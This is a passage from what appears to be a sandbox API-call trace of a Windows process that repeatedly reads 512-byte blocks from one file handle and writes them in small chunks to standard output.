(hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.988] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.989] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.989] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] GetFileType (hFile=0x50) returned 0x1 [0232.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.990] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.991] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.991] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] GetFileType (hFile=0x50) returned 0x1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.991] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] GetFileType (hFile=0x50) returned 0x1 [0232.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.992] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.992] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.992] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.993] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.994] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.994] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.995] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.995] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.997] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.997] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.998] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.998] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] 